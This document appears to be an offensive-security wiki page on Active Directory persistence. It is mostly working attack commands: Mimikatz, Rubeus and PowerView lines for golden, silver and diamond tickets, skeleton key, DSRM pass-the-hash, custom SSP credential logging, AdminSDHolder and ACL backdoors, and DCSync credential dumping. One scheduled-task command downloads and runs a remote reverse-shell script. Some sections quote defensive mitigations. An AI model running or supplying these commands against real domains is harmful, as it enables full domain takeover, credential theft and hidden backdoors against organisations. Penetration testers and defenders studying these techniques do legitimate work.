Persistence

Tool - SharPersist

LogoGitHub - mandiant/SharPersistGitHub

Install Chrome Extension For Persistence

Silently Install Chrome Extension For PersistenceSyntax-Err0r

AD DS Persistence

Insomnihack 2024

Or in French - LeHack 2023:

Golden Tickets

krbtgt hash could be used to impersonate any user

It is recommended to change the password of krbtgt account twice as password history is maintained for the account

Mimikatz on DC to get krbt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

DCSync (no code execution on the target DC) to get krbtgt hash

SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

krbtgt hash could also be dump from NTDS.dit

Create golden ticket

Using AES keys makes the attack more silent

From any machine connected with DC

Mimikatz

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

BetterSafetyKatz

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Rubeus

Rubeus.exe golden /aes256:<krbtgt_aes256_key> /sid:<domain_sid> /ldap /user:Administrator /printcmd

Mitigation

The following security control should be implemented to mitigate a Golden Ticket:

  • Change the KRBTGT password every 12 months, or when the domain has been compromised or suspected to have been compromised. Changing the KRBTGT password will invalidate any existing Golden Tickets that are being used.

    • To effectively change the KRBTGT user object’s password hash, and invalidate any Golden Tickets, the KRBTGT password must be reset twice. This is because both the new and old KRBTGT passwords are stored by Domain Controllers such that authentication in the domain is not disrupted during a KRBTGT password change. When resetting the KRBTGT password, it is important to ensure that sufficient time is allowed between password resets to ensure the new password has had time to replicate to all Domain Controllers. For more information, see Microsoft’s guidance and PowerShell script to assist with resetting the KRBTGT password.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Silver Tickets

Whereas golden tickets are forged TGTs, silver tickets are forged service tickets (TGS) - Encrypted and signed by the hash of the service account (golden ticket is signed by the hash of krbtgt)

Ex 1 : Access to file system on the DC

Using AES key is more silent

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Can be use for other services: HOST, RPCSS, HTTP, etc.

List of SPN: https://adsecurity.org/?page_id=183

Ex: HTTP With Rubeus

Rubeus.exe silver /service:http/dc.domain.local /rc4:<rc4_key_service_account> /sid:<domain_sid> /ldap /user:Administrator /domain:domain.local /ptt

Ex 2 : Achieve command execution using silver ticket

HOST SPN allow us to schedule a task on the target

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Schedule and execute a task

schtasks /create /S dc.domain.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c \"iex (New-Object Net-WebClient).DownloadString('http://IP/Invoke-PowershellTcp.ps1')\""

schtasks /Run /S dc.domain.local /TN "STCheck"

Mitigation

The following security controls should be implemented to mitigate a Silver Ticket:

  • Create User objects with SPNs as group Managed Service Accounts (gMSAs). gMSAs have automatic password rotation, a 120-character password and simplified SPN management. These security features protect the password from being cracked, reducing the likelihood of a successful Silver Ticket. However, if creating user objects with SPNs as gMSAs is not feasible, set a minimum 30-character password that is unique, unpredictable and managed is set.

  • Change all computer object (including Domain Controller) passwords every 30 days. Malicious actors can establish persistence in Active Directory using a computer object’s password; ensuring all computer object passwords (including Domain Controller passwords) are changed every 30 days can mitigate this persistence technique.

  • Ensure computer objects are not members of privileged security groups, such as the Domain Admins security group. If malicious actors obtain a computer object’s password hash, then they gain any privileges the computer object has in the domain.

  • Ensure the Domain Computers security group does not have write or modify permissions to any objects in Active Directory. All computer objects are members of the Domain Computers security group. If this security group has rights over other objects, then malicious actors can use these rights to compromise other objects and potentially escalate their privileges and perform lateral movement.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Diamond Tickets

Decrypt a valid TGT, make changes to it and re-encrypt it using krbtgt account

More opsec safe than a golden ticket

Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /user:target_username /password:target_password /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt

/tgtdeleg option in place of credentials in case we have access to a domain user

Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /tgtdeleg /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt

Skeleton Key

Patch a DC (lsass process) so that it allows access as any user with a single password

Skeleton Key is not opsec safe ad is known to caus issues with AD CS

Inject a skeleton key (password is mimikatz) on a DC.

DA privileges required

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.local

Now, we can access any machine with a valid username and password as "mimikatz"

Enter-PSSession -Computername dc -Credential domain\Administrator

In case lsass is running as a protected process, we need mimidriv.sys on disk of the target DC

Very noisy in logs - Service installation (Kernel mode driver)

mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !-

Modify the default key

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c#L611

For example, to use "S3c3rtP@ss", compute its RC4 and split it into 8 bytes stubs:

56aa742a
6bebb9ca
62fc9f70
a2e00cd3

Reverse the values by 2 bytes

2a74aa56
cab9eb6b
709ffc62
d30ce0a2

Prepend 0x to each and modify kiwikey array value in the code linked above

DWORD kiwiKey[] = {0x2a74aa56, 0xcab9eb6b, 0x709ffc62, 0xd30ce0a2}

Mitigation

The following security controls should be implemented to mitigate Skeleton Key:

  • Limit access to Domain Controllers to only privileged users that require access. This reduces the number of opportunities for malicious actors to gain access to Domain Controllers.

  • Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration. Domain Controllers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.

  • Run the LSASS process in protected mode. This makes it more difficult to override the LSASS process, which is required for Skeleton Key to succeed.

  • Implement Microsoft’s vulnerable driver blocklist. Restricting known malicious or vulnerable drivers on Domain Controllers makes it more difficult for malicious actors to bypass LSASS protection.

  • Restrict driver execution to an approved set. Restricting the drivers that can be loaded on Domain Controllers to an approved set hardens it against attempts to bypass LSASS protection. This can be achieved through application control solutions, including Microsoft’s Windows Defender Application Control.

  • Only use Domain Controllers for AD DS and do not install any non-security-related services or applications. This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller.

  • Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity. Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain.

  • Disable the Print Spooler service on Domain Controllers. For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to authenticate to a system they control to collect the Domain Controllers computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

DSRM - Directory Services Restore Mode

There is a local admin "Administrator" on every DC whose password is DSRM. DSRM password is required when a server is promoted to DC and it is rarely changed

Dump DSRM password - DA privileges needed

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc

Compare the Administrator hash with the Administrator hash of below command

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dc

Logon Behavior for the DSM account needs to be changed before passing the hash

Enter-PSSession -Computername dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

or

Invoke-Command -ComputerName dc -ScriptBlock {
    New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
}

Pass the hash

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc.domain.local /user:Administrator /ntlm:<dsrm_hash> /run:powershell.exe"'

ls \\dc\C$

To use PSRemoting, we must force NTLM authentication:

Enter-PSSession -ComputerName dc -Authentication Negotiate

Custom SSP

Security Support Provider is a DLL which provides ways for an application to obtain an authenticated session. Ex: NTLM, Kerberos, Wdigest, CredSSP

Mimikatz mimilib.dll is a custom SSP that logs local logons, service account and machine account passwords in clear text on the target server

All local logons on the DC are logged to C:\Windows\system32\mimilsa.log or C:\Windows\system32\kiwissp.log

Way 1

Drop mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

Way 2

Inject into lsass

Not stable with Server 2019 and Server 2022

Invoke-Mimikatz -Command '"misc::memssp"'

AdminSDHolder

Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL

Well Known abuse of Protected Groups

https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf

Protected Group
Abuse

Account Operators

Can modify DA/EA/BA groups. Can modify nested groups within these groups

Backup Operators

Backup GPO, edit to add SID of controlled account to a privileged group and Restore

Server Operators

Run a command as system (using the disabled Browser service)

Print Operators

Copy ntd.dit backup, load device drivers

Group Privileges

Add FullPermissions to a user

With DA privs, AdminSDHolder can be used as a backdoor/persistence mechanisme by adding a user with Full Permissions to the AdminSDHolder object

With PowerView

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

Set-DCPermissions -Method AdminSDHolder -SAMAccountName username -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -Verbose

Other permissions: ResetPassword, WriteMembers

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights ResetPassword -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights WriteMembers -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

Run SDProp manually

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

For pre-Server 2008:

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

Check Domain Admins permission

PowerView

get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -matche "username}

AD Module

(Get-Acl -Path 'AD:\C:\CN=Domain Admins,CN=Users,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'username'}

Exploit

FullControl

PowerView

Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

AD Module

Add-ADGroupMember -Identity 'Domain Admins' -Members testda

ResetPassword

PowerView

Set-DomainUserPassword -Idenity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

AD Module

Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Rights Abuse

With DA privs, the ACL for the domain root can be modified to provide rights like FullControl or the ability to run DCSync

FullControl

Add FullControl rights:

With PowerView

Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

https://github.com/samratashok/RACE

Set-ADCL -SAMAccountName username -Right GenericAll -DistinguishedName 'DC=domain,DC=local' -Verbose

Exploit

DCSync

Add rights for DCSync:

With PowerView

Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

https://github.com/samratashok/RACE

Set-ADCL -SAMAccountName username -GUIDRight DCSync -DistinguishedName 'DC=domain,DC=local' -Verbose

Execute DCSync

DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Security Descriptors

Modify Security Descriptors of multiple remote access methods to allow access to non-admin users. Admin privs are required

With RACE toolkit: https://github.com/samratashok/RACE

WMI

On local machine for user1

Set-RemoteWMI -SamAccoutName user1 -Verbose

On remote machine for user1 without explicit credentials

Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -Verbose

On remote machine with explicit credentials

Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -Credential Administrator -namespace 'root\cimv2' -Verbose

On remote machine remove permissions

Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -Remove -Verbose

PS Remoting backdoor

Not stable after August 2020 patches

On local machine for user1

Set-RemotePSRemoting -SamAccoutName user1 -Verbose

On remote machine for user1 without explicit credentials

Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -Verbose

On remote machine, remove permissions

Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -Remove

Remote Registry

With DAMP

Add-RemoteRegBackdoor -ComputerName dc -Trustee user1 -Verbose

As user1, retrieve machine account hash

Get machine account hash for silver ticket attack

Get-RemoteMachineAccountHash -ComputerName dc -Verbose

Retrieve local account hash

Get-RemoteLocalAccountHash -ComputerName dc -Verbose

Retrieve domain cached credentials

Get-RemoteCachedCredential -ComputerName dc -Verbose

msDS-AllowedToDelegateTo

SeEnableDelegationPrivilege on the DC and full rights on the target user - default for Domain Admins and Enterprise Admins

With Powershell

# PowerView

Set-DomainObject-Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject-Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/dc.domain.local"}
Set-DomainObject-SamAccountName devuser -Xor @{"useraccountcontrol"="16777216"}

Get-DomainUser –TrustedToAuth

# AD Module

Set-ADUser -Identity devuser -ServicePrincipalNames @{Add='dev/svc'}
Set-ADUser -Identity devuser Add @{@{'msDS AllowedToDelegateTo' = @('ldap/dc', 'ldap/dc.domain.local)} -Verbose
Set-ADAccountControl-Identity devuser -TrustedToAuthForDelegation $true

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

With Kekeo

kekeo# tgt::ask /user:devuser /domain:domain.local /password:Sup3rPassword!

kekeo# tgs::s4u /tgt:TGT_devuser@domain.local_krbtgt~domain.local@domain.local.kirbi /user:Administrator@domain.local /service:ldap/dc.domain.local

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@domain.local_ldap~dc.domain.local@domain.local.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

With Rubeus

# Get RC4 hash
Rubeus.exe hash /password:Sup3rPassword! /user:devuser /domain:domain.local

Rubeus.exe s4u /user:devuser /rc4:<rc4_hash> /impersonateuser:administrator /msdsspn:ldap/dc.domain.local /domain:domain.local /ptt

SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"
PreviousTrustsNextTiering

Last updated